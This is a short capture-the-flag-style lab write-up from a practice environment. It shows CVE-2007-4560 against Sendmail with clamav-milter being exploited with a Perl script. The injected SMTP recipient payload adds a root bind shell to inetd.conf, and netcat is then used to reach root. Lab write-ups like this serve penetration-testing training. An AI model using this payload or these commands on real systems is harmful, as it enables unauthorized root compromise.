InfoSec LAB

ClamAV_Exploitation

Created: 2 min read

CVE-2007-4560

Executing the Perl script

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clamav]
└─$ perl CVE-2007-4560.pl $IP
Sendmail w/ clamav-milter Remote Root Exploit
Copyright (C) 2007 Eliteboy
Attacking 192.168.236.42...
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Sat, 22 Mar 2025 15:43:58 -0400; (No UCE/UBE) logging access from: [192.168.45.192](FAIL)-[192.168.45.192]
250-localhost.localdomain Hello [192.168.45.192], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 52MJhwMr004062 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connection

Exploit successfully sent. If it worked, a bind shell should be available at the target port 31337

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clamav]
└─$ nmap -p31337 $IP                                                    
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-22 16:57 CET
Nmap scan report for 192.168.236.42
Host is up (0.023s latency).
 
PORT      STATE SERVICE
31337/tcp open  Elite
 
Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds

It worked.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clamav]
└─$ nc -nv $IP 31337
(UNKNOWN) [192.168.236.42] 31337 (?) open
whoami
root
hostname
0xbabe.local
ip a
-i: line 3: ip: command not found
ifconfig
eth0      Link encap:Ethernet  HWaddr 00:50:56:9E:A0:49  
          inet addr:192.168.236.42  Bcast:192.168.236.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:fe9e:a049/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:63083 errors:0 dropped:0 overruns:0 frame:0
          TX packets:56687 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:4856110 (4.6 MiB)  TX bytes:3414396 (3.2 MiB)
          Base address:0x2000 Memory:fd5c0000-fd5e0000 
 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:10 errors:0 dropped:0 overruns:0 frame:0
          TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:660 (660.0 b)  TX bytes:660 (660.0 b)

Initial Foothold established to the target system as the root user via exploiting CVE-2007-4560 System level compromise

Interactive Graph View

Backlinks